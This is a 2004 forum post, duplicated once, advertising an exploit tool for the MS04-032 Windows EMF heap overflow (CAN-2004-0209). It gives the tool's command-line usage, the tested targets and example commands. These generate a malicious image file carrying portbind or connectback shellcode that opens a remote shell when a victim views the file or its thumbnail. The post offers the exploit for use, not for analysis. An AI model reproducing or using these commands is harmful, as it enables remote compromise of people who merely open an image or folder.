Lucifer
10-25-2004, 07:45 PM
The vulnerability will be triggered by either viewing a malicious file or by navigating to a directory, which contains a malicious file and displays it as a thumbnail
Graphics Rendering Engine Vulnerability - CAN-2004-0209
Tested on
Internet Explorer 6.0 (SP1) (iexplore.exe)
Explorer (explorer.exe)
Windows XP SP1
Command Line Parameters/Arguments
Win_emf_HeapOverflow_MS04-032.exe <file> <shellcode> <bind/connectback port> [connectback IP]
Shellcode
1 - Portbind shellcode
2 - Connectback shellcode
Examples
C:\>Win_emf_HeapOverflow_MS04-032.exe expl.emf 1 7777
C:\>Win_emf_HeapOverflow_MS04-032.exe expl.emf 2 [Only registered and activated users can see links]
Graphics Rendering Engine Vulnerability - CAN-2004-0209
Tested on
Internet Explorer 6.0 (SP1) (iexplore.exe)
Explorer (explorer.exe)
Windows XP SP1
Command Line Parameters/Arguments
Win_emf_HeapOverflow_MS04-032.exe <file> <shellcode> <bind/connectback port> [connectback IP]
Shellcode
1 - Portbind shellcode
2 - Connectback shellcode
Examples
C:\>Win_emf_HeapOverflow_MS04-032.exe expl.emf 1 7777
C:\>Win_emf_HeapOverflow_MS04-032.exe expl.emf 2 [Only registered and activated users can see links]